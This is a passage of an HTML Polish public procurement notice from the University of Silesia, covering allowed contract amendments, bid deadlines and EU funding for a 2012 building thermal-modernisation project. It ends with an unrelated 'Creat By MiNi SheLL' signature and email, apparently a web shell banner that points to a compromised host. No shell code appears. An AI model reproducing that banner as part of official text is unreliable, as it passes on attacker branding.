2.	Zamawiający może wyrazić zgodę na dokonanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy wyłącznie w przypadku: <BR>
1)	konieczności przesunięcia terminu realizacji zamówienia, jeśli konieczność ta nastąpiła  na skutek okoliczności, których nie można było przewidzieć w chwili zawierania umowy,<BR>
2)	konieczności przesunięcia terminu realizacji zamówienia, jeśli konieczność ta nastąpiła na skutek   okoliczności leżących po stronie Zamawiającego,<BR>
3)	konieczności wykonania robót tzw. zamiennych, <BR>
4)	zmiany sposobu realizacji zamówienia z samodzielnej realizacji przez Wykonawcę, na realizację z udziałem podwykonawców, z zastrzeżeniem, iż podwykonawcy będą posiadać właściwości niezbędne, do realizacji zamówienia,<BR>
5)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy,<BR>
6)	ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy. Zamawiający nie dopuszcza możliwości zwiększenia wartości umowy, o której mowa
 w § 7 ust. 1 wzoru umowy, <BR>
7)	w sytuacji zmiany cen, w przypadku kiedy zmiana ta będzie korzystna dla Zamawiającego, tzn. na cenę niższą - na pisemny wniosek jednej ze Stron, <BR>
8)	w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.us.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> UNIWERSYTET ŚLĄSKI,
ul. BANKOWA 12,
40-007 KATOWICE,
DZIAŁ ZAMÓWIEŃ PUBLICZNYCH.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2012 godzina 09:30, miejsce: UNIWERSYTET ŚLĄSKI,
ul. BANKOWA 12,
40-007 KATOWICE,
DZIAŁ ZAMÓWIEŃ PUBLICZNYCH pok. 69..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu:
Kompleksowa termomodernizacja budynku Rektoratu Uniwersytetu Śląskiego 
w Katowicach nr UDA-RPSL.05.03.00-00-060/11-00 w ramach Regionalnego Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013;
Priorytet V Środowisko, Dzialanie 5.3. Czyste powietrze i odnawialne źródła energii; nr projektu - 1170; Umowa o dofinansowanie projektu z dnia 09.03.2012r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com